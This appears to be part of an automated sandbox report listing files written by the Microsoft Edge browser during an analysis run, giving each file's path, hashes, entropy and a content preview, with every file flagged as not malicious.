                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\52e00d3f-a4b3-4249-b2f9-032675cc8737.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\732a2d91-57fe-4686-b4b5-ba7e12f99149.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                  Entropy (8bit):5.287526653429432
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                                                                                                                                                  MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                                                                                                                                                  SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                                                                                                                                                  SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                                                                                                                                                  SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4949b.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                  Entropy (8bit):5.287526653429432
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n+:YcCpWsktsHnfc7CvsfgCgakhYhbj
                                                                                                                                                                                                                  MD5:C11A0C2888E9122AF3E0A9532E7CF485
                                                                                                                                                                                                                  SHA1:213F8630A4D6B265DB899E1B4FED27EC8F2F1C75
                                                                                                                                                                                                                  SHA-256:F08277C5DFC76862C95DA3763626FC4A099530B656C9ED5C42DE6E3079D64B57
                                                                                                                                                                                                                  SHA-512:BB02933E6DF73CF073C94460869B99200E08C1B293D476B6F7C76F012B0BF9126A60031A31555CB755DF9C464B16272FEB6B1E0C0528FFAF5BB934F5E87A279E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                  Entropy (8bit):1.1144062936620691
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBns:JkIEumQv8m1ccnvS6nW0cI9nj1a
                                                                                                                                                                                                                  MD5:FD4C7C4152AFB9DD4084FC6F998036DA
                                                                                                                                                                                                                  SHA1:268ECCFCA9D8F504D8EE37A06F4C071BE7EBA353
                                                                                                                                                                                                                  SHA-256:AAAF81A8A3B78FFF01D773EC22E645FB958C134F26D33D167BCBB08D007A3F92
                                                                                                                                                                                                                  SHA-512:AE1A547DBC042D1FA17FC82D95B1E857AAFB649FD5451BEB1E859782538116E8F29359975BB24B739EC6C371ED521B3886EF0F33364535C4456E2056E8E799DE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38ba7.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3a9fd.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3ab64.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c116718e-e592-421d-8c8b-b492dbe9a7fb.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d7a07133-f1ce-47aa-8239-264e0cf49689.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                  Entropy (8bit):0.8307038620100359
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:TLSOUOq0afDdWec9sJlAz7Nm2z8ZI7J5fc:T+OUzDbg3eAzA2ztc
                                                                                                                                                                                                                  MD5:B18967139991D9CA13DF7E493540A358
                                                                                                                                                                                                                  SHA1:97411C14A8503C11248BE7404C9A79BA5146D40C
                                                                                                                                                                                                                  SHA-256:CCC36F21951B4CB357C57DA0CCA1FFF3B4C7027230C10FD8BCB72C0AFF66141F
                                                                                                                                                                                                                  SHA-512:473AE1B215B181785EA65F87E34155D5976C7AD1FA487B025E1C8711BFD127E99066990105CDA8D6F4804459118361217455AB1644803D22E6ECB164EEEFD630
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9402
                                                                                                                                                                                                                  Entropy (8bit):5.0879422366456035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFkdAsa0JaFvrE9kurx3G88bV+FiAxU/PrYJ:stFjsa0JCDsr+bGiPw
                                                                                                                                                                                                                  MD5:80C939E415F0E49A405EF90D1BDC3FD0
                                                                                                                                                                                                                  SHA1:157438D74B39B95A87C0ED9CCD3CEB781AF4C81E
                                                                                                                                                                                                                  SHA-256:242C762323C1CAC250BABEBEFAA9DADDC652102AFA3D1FAAD79FF3E1F3EBB6A5
                                                                                                                                                                                                                  SHA-512:23BD36020D0E47E764650F3816D9811188C750EC0F5BE2CE1032908166AE157BFF9FFE81CA8FE40E31A9276E66051FEFDF7FD79A30048B766BA9AEF21442C581
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3d562.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9402
                                                                                                                                                                                                                  Entropy (8bit):5.0879422366456035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFkdAsa0JaFvrE9kurx3G88bV+FiAxU/PrYJ:stFjsa0JCDsr+bGiPw
                                                                                                                                                                                                                  MD5:80C939E415F0E49A405EF90D1BDC3FD0
                                                                                                                                                                                                                  SHA1:157438D74B39B95A87C0ED9CCD3CEB781AF4C81E
                                                                                                                                                                                                                  SHA-256:242C762323C1CAC250BABEBEFAA9DADDC652102AFA3D1FAAD79FF3E1F3EBB6A5
                                                                                                                                                                                                                  SHA-512:23BD36020D0E47E764650F3816D9811188C750EC0F5BE2CE1032908166AE157BFF9FFE81CA8FE40E31A9276E66051FEFDF7FD79A30048B766BA9AEF21442C581
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF40c22.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9402
                                                                                                                                                                                                                  Entropy (8bit):5.0879422366456035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFkdAsa0JaFvrE9kurx3G88bV+FiAxU/PrYJ:stFjsa0JCDsr+bGiPw
                                                                                                                                                                                                                  MD5:80C939E415F0E49A405EF90D1BDC3FD0
                                                                                                                                                                                                                  SHA1:157438D74B39B95A87C0ED9CCD3CEB781AF4C81E
                                                                                                                                                                                                                  SHA-256:242C762323C1CAC250BABEBEFAA9DADDC652102AFA3D1FAAD79FF3E1F3EBB6A5
                                                                                                                                                                                                                  SHA-512:23BD36020D0E47E764650F3816D9811188C750EC0F5BE2CE1032908166AE157BFF9FFE81CA8FE40E31A9276E66051FEFDF7FD79A30048B766BA9AEF21442C581
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF48180.TMP (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9402
                                                                                                                                                                                                                  Entropy (8bit):5.0879422366456035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFkdAsa0JaFvrE9kurx3G88bV+FiAxU/PrYJ:stFjsa0JCDsr+bGiPw
                                                                                                                                                                                                                  MD5:80C939E415F0E49A405EF90D1BDC3FD0
                                                                                                                                                                                                                  SHA1:157438D74B39B95A87C0ED9CCD3CEB781AF4C81E
                                                                                                                                                                                                                  SHA-256:242C762323C1CAC250BABEBEFAA9DADDC652102AFA3D1FAAD79FF3E1F3EBB6A5
                                                                                                                                                                                                                  SHA-512:23BD36020D0E47E764650F3816D9811188C750EC0F5BE2CE1032908166AE157BFF9FFE81CA8FE40E31A9276E66051FEFDF7FD79A30048B766BA9AEF21442C581
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                  Entropy (8bit):5.566063713502838
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:W2d9RQWG/W5wA2f4QH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPDbIvsG2rwXe+p0tW:WYzQx/WaA2fFHu1jaaubTO1tW
                                                                                                                                                                                                                  MD5:211A36A5AEB953DB50145EAD4B20FC0F
                                                                                                                                                                                                                  SHA1:11FE33220D8427EFBB7E31E0E401EA667779B745
                                                                                                                                                                                                                  SHA-256:55FB866713106BCB1BF1038C52D279F8D399FA42E92A6EB68439AE434455F605
                                                                                                                                                                                                                  SHA-512:AB90FE82D199CA97E7BD910F554DA374EE24DCE5CD8327D3535248EE3A43514989040BF46D0FDC962D7470E800246A0816E985A732B47C7B8854B5082AA3C7DC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379025968289386","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379025968289386","location":5,"ma

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3c749.TMP (copy)

                                                                                                                                                                                                                  Download File
